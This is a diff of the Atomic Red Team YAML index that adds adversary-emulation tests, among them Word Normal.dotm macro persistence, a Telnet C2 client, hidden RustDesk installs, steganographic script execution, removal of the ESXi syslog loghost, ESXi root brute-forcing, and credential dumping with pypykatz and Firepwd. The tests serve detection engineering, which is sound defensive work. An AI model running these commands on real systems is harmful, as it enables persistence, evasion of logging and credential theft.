+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+          Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+          Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+      input_arguments:
+        script_path:
+          description: AutoIt Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059\src\calc.au3
+        autoit_path:
+          description: AutoIt Executable File Path
+          type: path
+          default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+      executor:
+        command: 'Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
  T1609:
    technique:
      modified: '2023-04-15T16:03:19.642Z'
@@ -45124,7 +45427,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -45199,7 +45502,24 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
  T1574.011:
    technique:
      modified: '2023-03-30T21:01:38.651Z'
@@ -50264,7 +50584,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -50316,7 +50636,104 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
  T1546.009:
    technique:
      x_mitre_platforms:
@@ -57868,7 +58285,46 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1071
+    atomic_tests:
+    - name: Telnet C2
+      auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+      description: 'An adversary may establish telnet communication from compromised
+        endpoint to command and control (C2) server to be able to operate more attack
+        on objectives.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Command and Control (C2) server cam be established by running
+          PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with
+          specified IP that must be reachable by client (telnet_client.exe)
+
+          '
+        prereq_command: |
+          $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+          if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+        get_prereq_command: 'Write-Host "Setup C2 server manually"
+
+          '
+      input_arguments:
+        server_ip:
+          description: C2 server IP or URL
+          type: url
+          default: 127.0.0.1
+        client_path:
+          description: Client agent path
+          type: url
+          default: PathToAtomicsFolder\T1071\bin\telnet_client.exe
+        server_port:
+          description: C2 server port
+          type: Integer
+          default: 23
+      executor:
+        command: "#{client_path} #{server_ip} --port #{server_port}\n"
+        name: powershell
  T1219:
    technique:
      modified: '2023-09-28T16:23:51.194Z'
@@ -58247,6 +58703,22 @@ command-and-control:
          '
        name: powershell
        elevation_required: true
+    - name: RustDesk Files Detected Test on Windows
+      auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+      description: "An adversary may attempt to trick the user into downloading RustDesk
+        and use this to maintain access to the machine. \nDownload of RustDesk installer
+        will be at the destination location when successfully executed.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+          Start-Process -FilePath $file "/S"
+        cleanup_command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+        name: powershell
  T1659:
    technique:
      modified: '2023-10-01T02:28:45.147Z'
@@ -60098,9 +60570,9 @@ command-and-control:
          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
      executor:
@@ -60837,7 +61309,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -60859,7 +61331,156 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "cd \"PathToAtomicsFolder\\ExternalPayloads\\\"\nImport-Module .\\Extract-Invoke-PSImage.ps1\n$extractedScript=Extract-Invoke-PSImage
+          -Image \"#{image_file}\" -Out \"$HOME\\result.ps1\"\n$scriptContent = Get-Content
+          \"$HOME\\result.ps1\" -Raw\n$base64Pattern = \"(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])\"\n$base64Strings
+          = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value
+          }\n$base64Strings | Set-Content \"$HOME\\decoded.ps1\"\n$decodedContent
+          = Get-Content \"$HOME\\decoded.ps1\" -Raw\n$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))\n$textPattern
+          = '^.+'  \n$textMatches = [regex]::Matches($decodedText, $textPattern) |
+          ForEach-Object { $_.Value }\n$scriptPath = \"$HOME\\textExtraction.ps1\"\n$textMatches
+          -join '' | Set-Content -Path $scriptPath\n. \"$HOME\\textExtraction.ps1\"\n"
+        cleanup_command: "Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction
+          Ignore\nRemove-Item -Path \"$HOME\\result.ps1\" -Force -ErrorAction Ignore
+          \nRemove-Item -Path \"$HOME\\textExtraction.ps1\" -Force -ErrorAction Ignore\nRemove-Item
+          -Path \"$HOME\\decoded.ps1\" -Force -ErrorAction Ignore\n"
  T1008:
    technique:
      x_mitre_platforms:
@@ -61327,6 +61948,65 @@ collection:
          >nul 2>&1

          '
+    - name: ESXi - Remove Syslog remote IP
+      auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+      description: 'An adversary may edit the syslog config to remove the loghost
+        in order to prevent or redirect logs being received by SIEM.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: Username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "# Extract line with IP address from the syslog configuration output\n#{plink_file}
+          -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt
+          | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n#
+          Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username}
+          -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n#
+          Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath
+          = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath
+          -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n    Write-Host
+          \"The content is $fileContent\"\n    Write-Host \"The file is empty\"\n}
+          else {\n    # Use a regular expression to extract IP addresses\n    $ipAddresses
+          = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n
+          \   \n    $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n
+          \   $output | Out-File -FilePath $outputFilePath -Encoding ascii\n    \n
+          \   Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n"
+        cleanup_command: |
+          # Re-add the initially extracted IP
+          #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+          rm c:\temp\loghost_ip.txt
+          rm c:\temp\loghost.txt
+        name: powershell
+        elevation_required: true
  T1113:
    technique:
      modified: '2023-03-30T21:01:39.967Z'
@@ -67129,6 +67809,46 @@ credential-access:
        command: "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe
          bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt
          TestUser1 \n"
+    - name: ESXi - Brute Force Until Account Lockout
+      auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+      description: |
+        An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+        In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        lockout_threshold:
+          description: Specify the account lockout threshold configured on the ESXI
+            management server
+          type: string
+          default: '5'
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: |
+          $lockout_threshold = [int]"#{lockout_threshold}"
+          for ($var = 1; $var -le $lockout_threshold; $var++) {
+            #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+            }
+        name: powershell
+        elevation_required: false
  T1003:
    technique:
      x_mitre_platforms:
@@ -67641,44 +68361,51 @@ credential-access:
        elevation_required: true
    - name: Registry parse with pypykatz
      auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.

-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
        name: command_prompt
        elevation_required: true
    - name: esentutl.exe SAM copy
@@ -69751,14 +70478,16 @@ credential-access:
      auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
      description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
        Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
      supported_platforms:
      - windows
      input_arguments:
        Firepwd_Path:
          description: Filepath for Firepwd.py
          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
        Out_Filepath:
          description: Filepath to output results to
          type: string
@@ -69771,17 +70500,12 @@ credential-access:
          description: Filepath to python
          type: string
          default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
      dependency_executor_name: powershell
      dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: 'Firefox profile directory must be present

          '
